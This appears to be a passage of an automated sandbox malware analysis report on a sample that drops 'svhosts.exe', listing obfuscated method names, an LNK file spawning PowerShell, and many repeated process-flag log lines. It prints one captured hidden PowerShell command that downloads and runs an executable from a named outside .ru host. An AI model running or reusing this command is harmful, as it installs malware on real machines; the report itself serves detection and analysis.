                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, Wed7gG7WlW1qP0WfEkb.csHigh entropy of concatenated method names: 'uDp72ywXQ0', 'BRp70AGGw5', 'JmamsahfBUc4TJDPxd3', 'ObBypqhd95p0IEcVgMe', 'BLgfB5hmVGfLMHDcawR', 'IsoqH9h4gIywuYT5JXc', 'PlEO44hK7yWdDFXvshP', 'adKVrShJ3UlD0pBcsAn', 'mCO2UVhY8DSHJfbiZ15', 'Y4KiZrhvu7j0J732cwS'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, Gdvg3MbodIpgFTnDKf.csHigh entropy of concatenated method names: 'fIRsDHIiK', 'CbOFeNxX2', 'n8jHUT97x', 'F82tl3l4E', 'psW5s6y6UE9bx3pGa27', 'iPRDHAyWK924pLEUFHs', 'bvJf9Yyc2RgjnpErKI1', 'LTsmQHy2GXQidPdiLhq', 'WrMoqLyeuLohPnB1eue', 'xG278RyxNiJU2cHuO4F'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, ecue7q7k9j9d5RyCA8s.csHigh entropy of concatenated method names: 'EZH7NDapNE', 'UcZ7ZGGYQx', 'Ld7qVgRekuTq2w8W55t', 'QAELZ0RxlQAf2DWuv07', 'Ih3lUWR6y3LefwDSo59', 'y5cjriRWCc4sQnWntSl', 'hUpRI4RZiKHZcrwP3I0', 'Tqwq3MRgxbucIgxJweg'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, H0eS3bBbF2S3ec4ioDb.csHigh entropy of concatenated method names: 'fVjsuvdKBn', 'dNRsNVMQOR', 'S9xsZ56j4i', 'frZsgMgiO2', 'F6dse19Bcf', 'UFPsxFQg3B', 't2hs6eRyAX', 'XDcBkNpJHZ', 'SN1sWxg6FF', 'WInsc8CmOi'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, utxMM1A5k5Jqi00NUs.csHigh entropy of concatenated method names: 'mkViRfIX4', 'l8QkN4yrx6HIpU32IZb', 'jHct0fyRbSj6QkmFRex', 'wMijblyhc4YKxXqE3jE', 'vvPFxByq9ifX1AXqq4q', 'PhLbvDyjWIeagcpcGXy', 'g5xEu5yopl5rRR4mhVa', 'vvxoeuyTN1ZBlp5aUFT', 'ijhBtjynAyeN1fJovAO', 'fLloyoyVQ25rA0admlZ'

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Tries to download and execute files (via powershell)
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhosts.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

